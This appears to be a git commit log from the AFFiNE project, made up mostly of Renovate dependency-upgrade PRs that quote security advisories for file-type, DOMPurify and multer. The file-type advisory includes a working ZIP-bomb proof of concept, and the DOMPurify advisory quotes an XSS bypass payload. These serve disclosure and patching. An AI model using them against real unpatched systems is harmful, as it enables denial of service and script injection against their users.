`21.3.2`](https://renovatebot.com/diffs/npm/file-type/21.3.1/21.3.2) |
![age](https://developer.mend.io/api/mc/badges/age/npm/file-type/21.3.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/file-type/21.3.1/21.3.2?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-31808](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473)

### Impact
A denial of service vulnerability exists in the ASF (WMV/WMA) file type
detection parser. When parsing a crafted input where an ASF sub-header
has a `size` field of zero, the parser enters an infinite loop. The
`payload` value becomes negative (-24), causing
`tokenizer.ignore(payload)` to move the read position backwards, so the
same sub-header is read repeatedly forever.

Any application that uses `file-type` to detect the type of
untrusted/attacker-controlled input is affected. An attacker can stall
the Node.js event loop with a 55-byte payload.

### Patches
Fixed in version 21.3.1. Users should upgrade to >= 21.3.1.

### Workarounds
Validate or limit the size of input buffers before passing them to
`file-type`, or run file type detection in a worker thread with a
timeout.

### References
- Fix commit: 319abf871b50ba2fa221b4a7050059f1ae096f4f

### Reporter

crnkovic@lokvica.com

####
[CVE-2026-32630](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-j47w-4g3g-c36v)

## Summary

A crafted ZIP file can trigger excessive memory growth during type
detection in `file-type` when using `fileTypeFromBuffer()`,
`fileTypeFromBlob()`, or `fileTypeFromFile()`.

In affected versions, the ZIP inflate output limit is enforced for
stream-based detection, but not for known-size inputs. As a result, a
small compressed ZIP can cause `file-type` to inflate and process a much
larger payload while probing ZIP-based formats such as OOXML. In testing
on `file-type` `21.3.1`, a ZIP of about `255 KB` caused about `257 MB`
of RSS growth during `fileTypeFromBuffer()`.

This is an availability issue. Applications that use these APIs on
untrusted uploads can be forced to consume large amounts of memory and
may become slow or crash.

## Root Cause

The ZIP detection logic applied different limits depending on whether
the tokenizer had a known file size.

For stream inputs, ZIP probing was bounded by
`maximumZipEntrySizeInBytes` (`1 MiB`). For known-size inputs such as
buffers, blobs, and files, the code instead used
`Number.MAX_SAFE_INTEGER` in two relevant places:

```js
const maximumContentTypesEntrySize = hasUnknownFileSize(tokenizer)
	? maximumZipEntrySizeInBytes
	: Number.MAX_SAFE_INTEGER;
```

and:

```js
const maximumLength = hasUnknownFileSize(this.tokenizer)
	? maximumZipEntrySizeInBytes
	: Number.MAX_SAFE_INTEGER;
```

Together, these checks allowed a crafted ZIP to bypass the intended
inflate limit for known-size APIs and force large decompression during
detection of entries such as `[Content_Types].xml`.

## Proof of Concept

```js
import {fileTypeFromBuffer} from 'file-type';
import archiver from 'archiver';
import {Writable} from 'node:stream';

async function createZipBomb(sizeInMegabytes) {
	return new Promise((resolve, reject) => {
		const chunks = [];
		const writable = new Writable({
			write(chunk, encoding, callback) {
				chunks.push(chunk);
				callback();
			},
		});

		const archive = archiver('zip', {zlib: {level: 9}});
		archive.pipe(writable);
		writable.on('finish', () => {
			resolve(Buffer.concat(chunks));
		});
		archive.on('error', reject);

		const xmlPrefix = '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">';
		const padding = Buffer.alloc(sizeInMegabytes * 1024 * 1024 - xmlPrefix.length, 0x20);
		archive.append(Buffer.concat([Buffer.from(xmlPrefix), padding]), {name: '[Content_Types].xml'});
		archive.finalize();
	});
}

const zip = await createZipBomb(256);
console.log('ZIP size (KB):', (zip.length / 1024).toFixed(0));

const before = process.memoryUsage().rss;
await fileTypeFromBuffer(zip);
const after = process.memoryUsage().rss;

console.log('RSS growth (MB):', ((after - before) / 1024 / 1024).toFixed(0));
```

Observed on `file-type` `21.3.1`:
- ZIP size: about `255 KB`
- RSS growth during detection: about `257 MB`

## Affected APIs

Affected:
- `fileTypeFromBuffer()`
- `fileTypeFromBlob()`
- `fileTypeFromFile()`

Not affected:
- `fileTypeFromStream()`, which already enforced the ZIP inflate limit
for unknown-size inputs

## Impact

Applications that inspect untrusted uploads with `fileTypeFromBuffer()`,
`fileTypeFromBlob()`, or `fileTypeFromFile()` can be forced to consume
excessive memory during ZIP-based type detection. This can degrade
service or lead to process termination in memory-constrained
environments.

## Cause

The issue was introduced in 399b0f1

---

### Release Notes

<details>
<summary>sindresorhus/file-type (file-type)</summary>

###
[`v21.3.2`](https://redirect.github.com/sindresorhus/file-type/releases/tag/v21.3.2)

[Compare
Source](https://redirect.github.com/sindresorhus/file-type/compare/v21.3.1...v21.3.2)

- Fix ZIP bomb in known-size ZIP probing (GHSA-j47w-4g3g-c36v)
[`a155cd7`](https://redirect.github.com/sindresorhus/file-type/commit/a155cd7)
- Fix bound recursive BOM and ID3 detection
[`370ed91`](https://redirect.github.com/sindresorhus/file-type/commit/370ed91)

***

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My42Ni40IiwidXBkYXRlZEluVmVyIjoiNDMuNjYuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-14 23:44:06 +08:00
renovate[bot] d7d67841b8 chore: bump up file-type version to v21.3.1 [SECURITY] (#14625)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [file-type](https://redirect.github.com/sindresorhus/file-type) |
[`21.3.0` →
`21.3.1`](https://renovatebot.com/diffs/npm/file-type/21.3.0/21.3.1) |
![age](https://developer.mend.io/api/mc/badges/age/npm/file-type/21.3.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/file-type/21.3.0/21.3.1?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-31808](https://redirect.github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473)

### Impact
A denial of service vulnerability exists in the ASF (WMV/WMA) file type
detection parser. When parsing a crafted input where an ASF sub-header
has a `size` field of zero, the parser enters an infinite loop. The
`payload` value becomes negative (-24), causing
`tokenizer.ignore(payload)` to move the read position backwards, so the
same sub-header is read repeatedly forever.

Any application that uses `file-type` to detect the type of
untrusted/attacker-controlled input is affected. An attacker can stall
the Node.js event loop with a 55-byte payload.

### Patches
Fixed in version 21.3.1. Users should upgrade to >= 21.3.1.

### Workarounds
Validate or limit the size of input buffers before passing them to
`file-type`, or run file type detection in a worker thread with a
timeout.

### References
- Fix commit: 319abf871b50ba2fa221b4a7050059f1ae096f4f

### Reporter

crnkovic@lokvica.com

---

### Release Notes

<details>
<summary>sindresorhus/file-type (file-type)</summary>

###
[`v21.3.1`](https://redirect.github.com/sindresorhus/file-type/releases/tag/v21.3.1)

[Compare
Source](https://redirect.github.com/sindresorhus/file-type/compare/v21.3.0...v21.3.1)

- Fix infinite loop in ASF parser on malformed input
[`319abf8`](https://redirect.github.com/sindresorhus/file-type/commit/319abf8)

***

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41OS4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTkuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-11 13:58:31 +08:00
DarkSky 29a27b561b feat(server): migrate copilot to native (#14620)
#### PR Dependency Tree


* **PR #14620** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Native LLM workflows: structured outputs, embeddings, and reranking
plus richer multimodal attachments (images, audio, files) and improved
remote-attachment inlining.

* **Refactor**
* Tooling API unified behind a local tool-definition helper;
provider/adapters reorganized to route through native dispatch paths.

* **Chores**
* Dependency updates, removed legacy Google SDK integrations, and
increased front memory allocation.

* **Tests**
* Expanded end-to-end and streaming tests exercising native provider
flows, attachments, and rerank/structured scenarios.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-11 13:55:35 +08:00
DarkSky 9c55edeb62 feat(server): adapt gemini3.1 preview (#14583)
#### PR Dependency Tree


* **PR #14583** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added Gemini 3.1 Pro Preview support (text, image, audio) and new
GPT‑5 variants as defaults; centralized persistent telemetry state for
more reliable client identity.

* **UX**
  * Improved model submenu placement in chat preferences.
* More robust mindmap parsing, preview, regeneration and replace
behavior.

* **Chores**
  * Bumped AI SDK and related dependencies.

* **Tests**
  * Expanded/updated tests and increased timeouts for flaky flows.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-08 00:53:16 +08:00
DarkSky f34e25e122 test: migrate test & utils (#14569)
#### PR Dependency Tree


* **PR #14569** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Upgraded development test tooling to Vitest v4 and added Playwright
browser test integration; normalized test configurations and CI shard
matrix.

* **Tests**
* Added a large suite of new integration tests covering editor flows
(edgeless, database, embeds, images, latex, code, clipboard,
multi-editor, presentation, undo/redo, etc.).
* Removed numerous end-to-end Playwright test suites across the same
feature areas.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-07 04:12:27 +08:00
renovate[bot] 09fa1a8e4e chore: bump up dompurify version to v3.3.2 [SECURITY] (#14581)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.3.0` →
`3.3.2`](https://renovatebot.com/diffs/npm/dompurify/3.3.0/3.3.2) |
![age](https://developer.mend.io/api/mc/badges/age/npm/dompurify/3.3.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/dompurify/3.3.0/3.3.2?slim=true)
|

### GitHub Vulnerability Alerts

#### [CVE-2026-0540](https://nvd.nist.gov/vuln/detail/CVE-2026-0540)

DOMPurify 3.1.3 through 3.3.1 and 2.5.3 through 2.5.8, fixed in 2.5.9
and 3.3.2, contain a cross-site scripting vulnerability that allows
attackers to bypass attribute sanitization by exploiting five missing
rawtext elements (noscript, xmp, noembed, noframes, iframe) in the
`SAFE_FOR_XML` regex. Attackers can include payloads like
`</noscript><img src=x onerror=alert(1)>` in attribute values to execute
JavaScript when sanitized output is placed inside these unprotected
rawtext contexts.

---

### Release Notes

<details>
<summary>cure53/DOMPurify (dompurify)</summary>

###
[`v3.3.2`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.3.2):
DOMPurify 3.3.2

[Compare
Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.1...3.3.2)

- Fixed a possible bypass caused by jsdom's faulty raw-text tag parsing,
thanks multiple reporters
- Fixed a prototype pollution issue when working with custom elements,
thanks [@&#8203;christos-eth](https://redirect.github.com/christos-eth)
- Fixed a lenient config parsing in `_isValidAttribute`, thanks
[@&#8203;christos-eth](https://redirect.github.com/christos-eth)
- Bumped and removed several dependencies, thanks
[@&#8203;Rotzbua](https://redirect.github.com/Rotzbua)
- Fixed the test suite after bumping dependencies, thanks
[@&#8203;Rotzbua](https://redirect.github.com/Rotzbua)

###
[`v3.3.1`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.3.1):
DOMPurify 3.3.1

[Compare
Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.0...3.3.1)

- Updated `ADD_FORBID_CONTENTS` setting to extend default list, thanks
[@&#8203;MariusRumpf](https://redirect.github.com/MariusRumpf)
- Updated the ESM import syntax to be more correct, thanks
[@&#8203;binhpv](https://redirect.github.com/binhpv)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41Ni4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTYuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-06 19:04:08 +08:00
DarkSky 7f5f7e79df feat(server): refactor mcp (#14579)
#### PR Dependency Tree


* **PR #14579** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Full JSON-RPC MCP endpoint with batch requests, per-message
validation, method dispatch (initialize, ping, tools/list, tools/call)
and request cancellation
* Tool listing and execution with input validation, standardized
results, and improved error responses

* **Chores**
  * Removed an external protocol dependency
  * Bumped MCP server version to 1.0.1
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-03-06 06:35:34 +08:00
renovate[bot] bbc01533d7 chore: bump up multer version to v2.1.1 [SECURITY] (#14576)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [multer](https://redirect.github.com/expressjs/multer) | [`2.1.0` →
`2.1.1`](https://renovatebot.com/diffs/npm/multer/2.1.0/2.1.1) |
![age](https://developer.mend.io/api/mc/badges/age/npm/multer/2.1.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/multer/2.1.0/2.1.1?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-2359](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by dropping connection during file upload,
potentially causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

####
[CVE-2026-3304](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

####
[CVE-2026-3520](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2)

### Impact

A vulnerability in Multer versions < 2.1.1 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing stack overflow.

### Patches

Users should upgrade to `2.1.1`

### Workarounds

None

### Resources

-
https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2
- https://www.cve.org/CVERecord?id=CVE-2026-3520
-
https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752
- https://cna.openjsf.org/security-advisories.html

---

### Release Notes

<details>
<summary>expressjs/multer (multer)</summary>

###
[`v2.1.1`](https://redirect.github.com/expressjs/multer/blob/HEAD/CHANGELOG.md#211)

[Compare
Source](https://redirect.github.com/expressjs/multer/compare/v2.1.0...v2.1.1)

- Fix [CVE-2026-3520](https://www.cve.org/CVERecord?id=CVE-2026-3520)
([GHSA-5528-5vmv-3xc2](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2))
- fix error/abort handling

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41NS40IiwidXBkYXRlZEluVmVyIjoiNDMuNTUuNCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-06 01:04:48 +08:00
renovate[bot] fc9b99cd17 chore: bump up ava version to v7 (#14563)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [ava](https://avajs.dev)
([source](https://redirect.github.com/avajs/ava)) | [`^6.4.1` →
`^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/ava/7.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ava/6.4.1/7.0.0?slim=true)
|
| [ava](https://avajs.dev)
([source](https://redirect.github.com/avajs/ava)) | [`^6.4.0` →
`^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/ava/7.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ava/6.4.1/7.0.0?slim=true)
|

---

### Release Notes

<details>
<summary>avajs/ava (ava)</summary>

###
[`v7.0.0`](https://redirect.github.com/avajs/ava/releases/tag/v7.0.0)

[Compare
Source](https://redirect.github.com/avajs/ava/compare/v6.4.1...v7.0.0)

##### What's Changed

- Replace `strip-ansi` with `node:util.stripVTControlCharacters` by
[@&#8203;fisker](https://redirect.github.com/fisker) in
[#&#8203;3403](https://redirect.github.com/avajs/ava/pull/3403)
- Remove support for Node.js 18 and 23; require 20.19 or newer, 22.20 or
newer or 24,12 or newer; update dependencies including transitive `glob`
by [@&#8203;novemberborn](https://redirect.github.com/novemberborn) in
[#&#8203;3416](https://redirect.github.com/avajs/ava/pull/3416)

**Full Changelog**:
<https://github.com/avajs/ava/compare/v6.4.1...v7.0.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40OC4xIiwidXBkYXRlZEluVmVyIjoiNDMuNDguMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-03 17:47:47 +08:00
renovate[bot] 5464d1a9ce chore: bump up multer version to v2.1.0 [SECURITY] (#14544)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [multer](https://redirect.github.com/expressjs/multer) | [`2.0.2` →
`2.1.0`](https://renovatebot.com/diffs/npm/multer/2.0.2/2.1.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/multer/2.1.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/multer/2.0.2/2.1.0?slim=true)
|

### GitHub Vulnerability Alerts

####
[CVE-2026-2359](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by dropping connection during file upload,
potentially causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

####
[CVE-2026-3304](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p)

### Impact

A vulnerability in Multer versions < 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially
causing resource exhaustion.

### Patches

Users should upgrade to `2.1.0`

### Workarounds

None

---

### Release Notes

<details>
<summary>expressjs/multer (multer)</summary>

###
[`v2.1.0`](https://redirect.github.com/expressjs/multer/blob/HEAD/CHANGELOG.md#210)

[Compare
Source](https://redirect.github.com/expressjs/multer/compare/v2.0.2...v2.1.0)

- Add `defParamCharset` option for UTF-8 filename support
([#&#8203;1210](https://redirect.github.com/expressjs/multer/pull/1210))
- Fix [CVE-2026-2359](https://www.cve.org/CVERecord?id=CVE-2026-2359)
([GHSA-v52c-386h-88mc](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc))
- Fix [CVE-2026-3304](https://www.cve.org/CVERecord?id=CVE-2026-3304)
([GHSA-xf7r-hgr6-v32p](https://redirect.github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 13:59:38 +08:00
renovate[bot] 76d28aaa38 chore: bump up @types/supertest version to v7 (#14546)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@types/supertest](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/supertest)
([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/supertest))
| [`^6.0.2` →
`^7.0.0`](https://renovatebot.com/diffs/npm/@types%2fsupertest/6.0.3/7.2.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@types%2fsupertest/7.2.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@types%2fsupertest/6.0.3/7.2.0?slim=true)
|

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 13:58:48 +08:00
DarkSky c5d622531c feat: refactor copilot module (#14537) 2026-03-02 13:57:55 +08:00
renovate[bot] e249e2e884 chore: bump up opentelemetry (#14543)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.211.0` →
`^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.211.0/0.212.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.212.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.211.0/0.212.0?slim=true)
|
|
[@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`2.5.0` →
`2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.5.0/2.5.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-zipkin/2.5.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-zipkin/2.5.0/2.5.1?slim=true)
|
|
[@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics))
| [`0.38.2` →
`0.38.3`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.38.2/0.38.3)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fhost-metrics/0.38.3?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fhost-metrics/0.38.2/0.38.3?slim=true)
|
|
[@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.211.0` →
`^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.211.0/0.212.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation/0.212.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation/0.211.0/0.212.0?slim=true)
|
|
[@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql))
| [`^0.58.0` →
`^0.60.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.58.0/0.60.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-graphql/0.60.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-graphql/0.58.0/0.60.0?slim=true)
|
|
[@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.211.0` →
`^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.211.0/0.212.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-http/0.212.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-http/0.211.0/0.212.0?slim=true)
|
|
[@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis))
| [`^0.59.0` →
`^0.60.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.59.0/0.60.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-ioredis/0.60.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-ioredis/0.59.0/0.60.0?slim=true)
|
|
